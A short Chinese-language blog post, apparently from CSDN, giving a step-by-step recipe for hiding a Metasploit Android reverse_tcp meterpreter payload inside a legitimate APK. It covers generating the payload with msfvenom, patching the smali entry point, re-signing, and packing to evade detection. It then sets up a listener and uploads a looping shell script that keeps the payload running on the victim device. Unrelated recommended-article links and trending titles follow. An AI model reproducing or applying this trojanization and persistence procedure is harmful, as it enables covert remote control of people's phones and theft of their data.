Android payload注入
参考了网络很多大神文章,简单小结一下,仅供参考
1,msfvenom -p android/meterpreter/reverse_tcp LHOST=本机IP LPORT=监听端口号 -o virus.apk
2,apktook反编译virus.apk和normal.apk
3,找normal.apk入口,normal.apk的androidManifest.xml文件中查找MainActivety和Launch关键词,
4,找到com/xxx/xxx/MainActivety.smail文件并搜索onCreat函数,找到bundle对象在下面添加启动payload: invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
5,把virus.apk的smail文件(payload的smail/com/metasploit文件),复制到normal.apk的smail/com/目录下
6,androidManifest.xml 添加权限permission
7,回编译 //https://blog.csdn.net/weixin_44212888/article/details/111396635
8,签名 //https://blog.csdn.net/weixin_44212888/article/details/111396635
9,加壳 //百度"加壳工具"
10,service postgresql start //启动数据库
11,msfconsole //启动msf
12,use exploit/multi/handler //加载攻击模块
13,set payload android/meterpreter/reverse_tcp //选择要使用的Payload
14,show options //查看需要设置的参数
15,exploit //执行
16,持续监听编写一个sh脚本,保存桌面并赋权限
#! /bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN(action标签) -n com.metasploit.stage/.MainActivity
sleep 20
done
meterpreter > pwd //找到当前路径
meterpreter > upload /root/桌面/chixu.sh //上传脚本
meterpreter > shell //输入shell
pwd
/
cd /data/user/0/com.baidu.flashlight/files //找到脚本所在文件夹
ls
chixu.sh
sh chixu.sh //运行脚本
msf支持上线自动执行命令,设置InitialAutoRunScript或autorunscript可以让你上线的session自动上传并执行脚本
Android payload注入相关推荐
- Android 依赖注入: Dagger 2 实例解说(一)
本文原创,转载请注明出处:http://blog.csdn.net/zjbpku [Duplicated] link to Dagger on Android - Dagger2具体解释 关于D ...
- 【Android 逆向】Android 进程注入工具开发 ( 总结 | 源码编译 | 逆向环境搭建使用 | 使用进程注入工具进行逆向操作 ) ★★★
文章目录 一.Android 进程注入工具开发系列博客 二.Android 进程注入工具 源码下载编译 三.逆向环境搭建 四.使用注入工具进行逆向操作 1.获取远程进程号 2.注入工具准备 3.注入动 ...
- 【Android 逆向】Android 进程注入工具开发 ( 远程调用 | x86 架构的返回值获取 | arm 架构远程调用 )
文章目录 前言 一.x86 架构的返回值获取 二.ARM 架构远程调用 前言 在之前的博客 [Android 逆向]Android 进程注入工具开发 ( 注入代码分析 | 获取 远程 目标进程 中的 ...
- 【Android 逆向】Android 进程注入工具开发 ( 注入代码分析 | 注入工具收尾操作 | 关闭注入的动态库 | 恢复寄存器 | 脱离远程调试附着 )
文章目录 一.dlclose 函数简介 二.关闭注入的 libbridge.so 动态库 三.恢复寄存器 四.脱离远程调试附着 一.dlclose 函数简介 dlclose 函数的作用是 卸载一个 指 ...
- 【Android 逆向】Android 进程注入工具开发 ( 注入代码分析 | 获取注入的 libbridge.so 动态库中的 load 函数地址 并 通过 远程调用 执行该函数 )
文章目录 一.dlsym 函数简介 二.获取 目标进程 linker 中的 dlsym 函数地址 三.远程调用 目标进程 linker 中的 dlsym 函数 获取 注入的 libbridge.so ...
- 【Android 逆向】Android 进程注入工具开发 ( 注入代码分析 | 获取 linker 中的 dlopen 函数地址 并 通过 远程调用 执行该函数 )
文章目录 一.dlopen 函数简介 二.获取 目标进程 linker 中的 dlopen 函数地址 三.远程调用 目标进程 linker 中的 dlopen 函数 一.dlopen 函数简介 dlo ...
- 【Android 逆向】Android 进程注入工具开发 ( 注入代码分析 | 远程调用 目标进程中 libc.so 动态库中的 mmap 函数 三 | 等待远程函数执行完毕 | 寄存器获取返回值 )
文章目录 前言 一.等待远程进程 mmap 函数执行完毕 二.从寄存器中获取进程返回值 三.博客资源 前言 前置博客 : [Android 逆向]Android 进程注入工具开发 ( 注入代码分析 | ...
- 【Android 逆向】Android 进程注入工具开发 ( 注入代码分析 | 远程调用 目标进程中 libc.so 动态库中的 mmap 函数 二 | 准备参数 | 远程调用 mmap 函数 )
文章目录 一.准备 mmap 函数的参数 二.mmap 函数远程调用 一.准备 mmap 函数的参数 上一篇博客 [Android 逆向]Android 进程注入工具开发 ( 注入代码分析 | 远程调 ...
- 【Android 逆向】Android 进程注入工具开发 ( 注入代码分析 | 调试进程 ATTACH 附着目标进程 | 读取目标函数寄存器值并存档 )
文章目录 一.调试进程 ATTACH 附着目标进程 二.读取目标函数寄存器值并存档 1.主要操作流程 2.ptrace 函数 PTRACE_GETREGS 读取寄存器值 一.调试进程 ATTACH 附 ...
最新文章
- 给你的网站穿上外衣 - HTTPS 免费部署指南
- 10个免费在线逻辑关系图表图形设计制作工具
- UITableVIew的性能优化-重用原理
- 加载torchvision中预训练好的模型并修改默认下载路径
- 【搜索引擎基础知识2】网络爬虫
- Python--简单的目录扫描脚本
- 清北·NOIP2017济南考前冲刺班 DAY1 morning
- android保存字符到sd卡,android 保存TXT文件到SD卡方法
- lua虚拟机字节码修改_LUA虚拟机的字节码怎么看?
- 扩展CheckBoxList实现选中绑定
- python基础其他(二十一)
- 由于BOM头导致的Json解析出错
- JavaWeb——Servlet(入门必备,web请求与响应的底层)
- CAS单点登录(SSO)
- oracle 自增长这么使用,Eova Oracle 自增长的处理
- pdf关键字搜索盖章,长关键字定位
- python图像分类实验总结_第4章 图像分类(image classification)基础
- html页面布局主要有哪些形式,HTML页面布局形式与原则
- Eureka 源码解析 —— Eureka-Server 集群同步
- 巨人就在你的身边——14期英语反馈表彰大会有感
热门文章
- 发几个很二的笑话让大家笑一下!笑一笑,十年少.
- site about oo
- 云服务器好还是高防服务器好
- Mysql + Mybatis批量更新报错 BadSqlGrammarException
- 高等数学公式大全(二)
- 工作流平台airflow简介
- 哈夫曼树的构造C/C++代码实现
- linux defunct 进程,Defunct进程(死进程)
- defunct(DEFUNCTRUEGO)
- springboot毕设项目漫语在线论坛设计与实现5i5u1(java+VUE+Mybatis+Maven+Mysql)